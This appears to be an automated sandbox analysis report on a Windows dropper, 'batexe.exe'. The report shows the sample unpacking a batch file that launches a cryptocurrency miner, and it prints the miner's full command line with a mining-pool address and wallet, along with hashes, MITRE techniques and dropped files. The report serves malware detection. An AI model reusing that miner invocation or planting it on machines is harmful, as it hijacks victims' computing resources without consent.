73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
303s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
23/02/2024, 16:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3100	b2e.exe
1532	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1532	cpuminer-sse2.exe
1532	cpuminer-sse2.exe
1532	cpuminer-sse2.exe
1532	cpuminer-sse2.exe
1532	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/548-20-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 548 wrote to memory of 3100	548	batexe.exe	92
PID 548 wrote to memory of 3100	548	batexe.exe	92
PID 548 wrote to memory of 3100	548	batexe.exe	92
PID 3100 wrote to memory of 2320	3100	b2e.exe	93
PID 3100 wrote to memory of 2320	3100	b2e.exe	93
PID 3100 wrote to memory of 2320	3100	b2e.exe	93
PID 2320 wrote to memory of 1532	2320	cmd.exe	96
PID 2320 wrote to memory of 1532	2320	cmd.exe	96

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:548
- C:\Users\Admin\AppData\Local\Temp\4532.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\4532.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\4532.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5167.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2320
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4532.tmp\b2e.exe

Filesize
625KB

MD5
3137d61831753545a377ba1746e99c63

SHA1
e220295a315385622331dd02df079164fa947131

SHA256
e09259a3f4432eb28c9c8f9aa07369e3042cd89b301660abb7046db4e61b32f9

SHA512
bc9f17d431decab618fcbbd26ad30a3eda1bb8dd23e468a75abf9d764af18c369fef60101671c59ececcfff433295d43cb09a17df23957f6b346229715397aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\4532.tmp\b2e.exe

Filesize
489KB

MD5
1f63b9eab51284faaa4677c359a514ec

SHA1
05ad3a61c3a9a13548e3b1f5f3eea01ccfa265b0

SHA256
eedbdae5f4033c5e5659b6a8c21bb8d0fabd7746b0a2610f5b36302307daf4f4

SHA512
80603c71c72f8c62f7e2b2bfcdf010ec2ba4cf46fd03f33eda06c99a051243cbd61075cd382eec2dad364073212927d3ddc5eb26757b7db84665198a2cf32942

Download Submit
C:\Users\Admin\AppData\Local\Temp\4532.tmp\b2e.exe

Filesize
322KB

MD5
2c1a97c4378181c5b088dbdeb9a675e2

SHA1
8fc784b253f74a70f3c6bfacd5444b12e0bff897

SHA256
d16fe1727615bc6d4a8d62dca2a3b2b6ba64f8460b7d5a99188246439c91d988

SHA512
a5fb3b57819c4605fa1a5e3fc08418bf2b326f83e88d2cd26a6a77fe623849b4629092fca938f1ccabfb94d75ef3408189331d92c9abeb81c48f5efcec296dca

Download Submit
C:\Users\Admin\AppData\Local\Temp\5167.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
245KB

MD5
1a1312c97de206af748a7fe6e2693dc2

SHA1
ec8e7b962b1d86eb5ac5da5deecafe64755f8582

SHA256
fd251e5e1f7abc36323906f9e2307787530712d408f629e715ac42f2c4097588

SHA512
3eb474297c45dfcb0a676d4e6700e171182f96f057bc9ec6d2ef7b97ad8967132f5efe707309f3a8b8095e5117a7e52ce5e6ff7aaedcd7929bd1d5de4331aa19

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
135KB

MD5
23a17e2a0336bc6a7353931e4a4496ed

SHA1
e18568c2b29c171b56f6d8efb869238735165335

SHA256
146653122aaad983bcea8826eec599af46a7d02924f73e81a9e34507a31c77ce

SHA512
b77be3dbd5fdc2c95287572a1434de1b405b67cda05ce3c1c62cdeaa9d4e345adf53f4a52bb86d5c8362e798ad8a2e5a74b104ed60bcf33c3c6e4d1b0545ad4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
253KB

MD5
2628f8cbd178a4ae0d28aa109a070212

SHA1
e2daeded29e1d9f74e9b458c9d2c5aa481f8cd17

SHA256
16ad22f93bcf3b0e54a9458bdca441d8160614a18d1b317ba34f7edbe14abac8

SHA512
d6ea05c6a802ff1415482ce1e91e8e107e410a9728c7c5812686961d9ba4c273932f388707b0de5c79ed5ac743c8dd08f280b5ac90a183da298ce36252072732

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
156KB

MD5
4f86d3632d2d6af84e7cc67022d55dc5

SHA1
9f53e5d532cf7a73e9c35c4630ee233d959416c8

SHA256
30f667d341d87e289a887b9a12c335333f2fe5d79d73ff754c360487eb1ea73e

SHA512
b5a0c197ba8fa34dc85899ca07748930b700a7535edcb1a6f5ad2bb53848821f39506653a3f000737d4b3e1c701f038aa1878ef25b4ff833d6c9ca359023bbcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
329KB

MD5
01677445babff56ae654d2ba2a89dcd6

SHA1
4aaaa341af1c5e8b85a7d27039937a0eab99f781

SHA256
a3dc51fc977e64dd36f3079f604e8a0bafcbda738d2be36753afb39df426e1be

SHA512
a1e4c7a01d09e02e189daec94960b6c485380df04d7f7700d373004f9a842b7ccfd417f2037402d65567df86baad7177ac837e11b2f7f1df578cb2e6ea232fdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
278KB

MD5
d80e1fa4508050e7c0024d72f799d8c4

SHA1
29f1025d84f3291aa2812d1181f2e0d7122ce3e4

SHA256
9d23a6e62ac74787389f22a6589b52f284eca4e4cb585696188d2e4fd2acd22c

SHA512
3f0b058eb42110bfa0b7795e9eb41a6194aeaf71d5e8685bea6ce88cdfc2f938d5e983df2f729e7e504b04939f73d99c829ee308ad77070e49171d35f5a5bc86

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
182KB

MD5
54f3e047d67119973f5abf55aa7ecd51

SHA1
bf258f5fbfe9b4ff98dd75323a7a21338b58d92b

SHA256
647aa6f1d0348dbf8fd988e6a180bd94bef74b143e73ed1bada9fa145a81920a

SHA512
7c44df3ac1fbeaea0aea818fa04317e6048d8f999b7de9569bd5d987f6b20cedb9567f9f6e528f9ed7fc704e686d3a371fc61279940fdd93c29edd185147ef3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
209KB

MD5
32bad3be32fdf6cb4cd1e6ad6ae9cee4

SHA1
df09967ae02194b0b6ee0fa37e6ae917d9f5cc3f

SHA256
1869cd2dfb12e8f5e06a6470eacd606a58ca5aa22b6380368fde215ec52563ec

SHA512
0b197a54afe8b1486b2c66ccc0f28dbf8127cb3088173c594336a28fa18e694670d087e46a3d3cde851ce2d33f479a30c855de44b0085e0800649821cf33d40f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
209KB

MD5
a2ed65f7849e1ed66d8d802739998c9a

SHA1
b5d29dd24b698fd42818aae4c2935ee1b4273939

SHA256
20c8bf1eb580ba5647776079e82472bd0a07c1dbcd97924844a88d698e11d222

SHA512
99c351468ad82773e7f9d6d7382ce621a71893ae9d05e0ac4df8e6aaac02bef9fc315d404e1f9bf8794632443a85343b01368a376cc7cfa1c7f596846202b647

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
366KB

MD5
d4e5c346ee5e20858b22712f249ef0fe

SHA1
a8a2c953845b0409498f7576722b572f3f0c671d

SHA256
a83d068bfd080ed4de0ceb6c303659a6d60fb3c3bdab83e1e99b91b13d278aa7

SHA512
a5b597dc3ca055ec8ba8f6e955a7c30fdbe4f5f7325f8edfe7c55808f79d2ad8f924a616eb80b35b8b5fb9f05ca90526f9fd6efb0bc6391e764eac45f2b0f21d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
128KB

MD5
970ae71d93265746ebec8d534e623180

SHA1
306ab3f68c0758f57e5b338ecdde0ec1e23b8293

SHA256
a94a3251c02b29970266b60f4417fe635df8b60e41242be143f7dd797af75513

SHA512
4ce57e3f77523e18e08bce0e44ada7ebe15ce6293197d914079bf19cec5d241ba5c7d7fc8f2a1ef8f2336d4d258d1d84ec0cb4626b46dde3952867a5fcd74216

Download Submit
memory/548-20-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1532-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1532-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1532-46-0x000000006DB00000-0x000000006DB98000-memory.dmp

Filesize
608KB

Download
memory/1532-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1532-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1532-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/1532-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1532-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1532-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1532-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1532-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1532-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1532-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3100-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3100-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download